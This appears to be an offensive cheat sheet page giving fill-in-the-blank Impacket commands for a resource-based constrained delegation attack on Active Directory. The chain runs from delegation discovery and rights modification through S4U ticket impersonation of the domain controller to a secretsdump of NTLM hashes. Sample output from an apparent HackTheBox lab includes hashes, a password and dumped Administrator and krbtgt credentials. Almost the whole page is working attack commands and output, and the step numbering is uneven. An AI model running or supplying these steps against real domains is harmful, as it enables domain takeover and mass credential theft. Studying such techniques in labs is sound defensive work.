Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: RBCD Attack
1. Find delegation
# Check delegation
sudo ntpdate -s <DC> && impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC> -hashes :<HASH> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-findDelegation 'rebound.htb/delegator$' -dc-ip dc01.rebound.htb -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -no-pass
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[*] Getting machine hostname
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
3. RBCD Attack
# Add delegation
sudo ntpdate -s <DC> && impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -delegate-from '<TARGET_1>' -delegate-to '<USER>' -action write -dc-ip <DC> -use-ldaps
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-rbcd 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -delegate-from 'ldap_monitor' -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
# Check
sudo ntpdate -s <DC> && impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC> -hashes :<HASH> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && impacket-findDelegation 'rebound.htb/delegator$' -dc-ip dc01.rebound.htb -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -no-pass
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo
------------ ----------------------------------- -------------------------- ---------------------
ldap_monitor Person Resource-Based Constrained delegator$
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb
4. Get a service ticket
# Impersonate
impacket-getST '<DOMAIN>/<TARGET_1>:<TARGET_1_PASSWORD>' -spn <SERVICE_1>/<TARGET_DOMAIN> -impersonate '<TARGET_2>'
Sample Output:
$ impacket-getST 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
# Check forwardable flag
describeTicket.py <TICKET_1>.ccache
Sample Output:
$ impacket-describeTicket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : a1633e3d4f841386c7845309a671bcbb
[*] User Name : DC01$
[*] User Realm : rebound.htb
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Start Time : 23/09/2024 04:58:00 AM
[*] End Time : 23/09/2024 14:57:58 PM
[*] RenewTill : 24/09/2024 04:57:56 AM
[*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : oWM+PU+EE4bHhFMJpnG8uw==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$33332d861 ...[SNIP]... 27870efddc
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
5. Impersonate
impacket-getST -spn <SERVICE_2>/<TARGET_DOMAIN> -impersonate <TARGET_2> '<DOMAIN>/<USER>' -hashes :<HASH> -additional-ticket <TICKET_1>.ccache
Sample Output:
$ impacket-getST -spn http/dc01.rebound.htb -impersonate DC01$ 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
4. Secrets Dump
export KRB5CCNAME='<TICKET_2>.ccache'
Sample Output:
$ export KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache'
impacket-secretsdump -no-pass -k <DC> -just-dc-ntlm
Sample Output:
$ impacket-secretsdump -no-pass -k dc01.rebound.htb -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
...[SNIP]...
[*] Cleaning up..